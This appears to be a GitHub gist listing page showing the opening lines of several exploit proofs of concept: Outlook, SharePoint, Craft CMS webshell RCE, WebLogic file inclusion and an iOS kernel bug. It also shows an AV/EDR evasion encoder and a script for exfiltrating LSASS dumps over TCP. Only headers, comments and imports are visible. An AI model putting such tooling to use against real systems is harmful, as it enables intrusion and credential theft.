Skip to content

Instantly share code, notes, and snippets.

View DummyKitty's full-sized avatar
🐟
Touching fish

Kiyy DummyKitty

🐟
Touching fish
121 followers · 221 following
View GitHub Profile
@Homer28
Homer28 / test_dll.c
Last active June 29, 2025 09:52
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@testanull
testanull / SharePwn_public.py
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@xen0bit
xen0bit / Dockerfile
Created October 11, 2023 04:19
CVE-2023-38545
FROM debian:latest
RUN apt-get update && apt-get install -y \
git \
build-essential \
wget \
python3
WORKDIR /build
@to016
to016 / CVE-2023-41892-POC.md
Last active November 27, 2024 18:01
CVE-2023-41892 (Craft CMS Remote Code Execution) - POC

This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).

Overview

CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

POC

This POC is depending on writing webshell, so finding a suitable folder with writable permission is necessary.

@Mayfly277
Mayfly277 / EncodeAssembly.ps1
Last active March 18, 2025 11:10
This script is a modification of the one from @snovvcrash website : https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly and some code of PowerSharpPack. This is made to package some bniaries to powershell.
Function Invoke-EncodeAssembly
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true)]
[String]
$binaryPath,
[Parameter(Mandatory=$true)]
[String]
@jakeajames
jakeajames / poc.c
Last active September 17, 2025 04:15
CVE-2021-30955 PoC
#include <stdlib.h>
#include <stdio.h>
#include <pthread/pthread.h>
#include <mach/mach.h>
struct ool_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports[];
};
@picar0jsu
picar0jsu / CVE-2022-21371
Last active April 26, 2023 06:59
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019, WebLogic 12.2.1.3.0, Peoplesoft 8.57.22
# CVE : CVE-2022-21371
# Description
@wdormann
wdormann / checkjndi.py
Last active December 22, 2021 16:28
Check for JAR files that may be vulnerable to CVE-2021-44228
# This script is deprecated.
# See https://github.com/CERTCC/CVE-2021-44228_scanner for up-to-date scanners
@snovvcrash
snovvcrash / GetZip.py
Last active November 5, 2025 12:31
Exfiltrate LSASS dump over TCP
#!/usr/bin/env python3
# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
# Requirements: pip3 install tqdm pypykatz
import os
import socket
import zipfile
import hashlib
from argparse import ArgumentParser
@testanull
testanull / asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
Created September 28, 2021 16:05
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):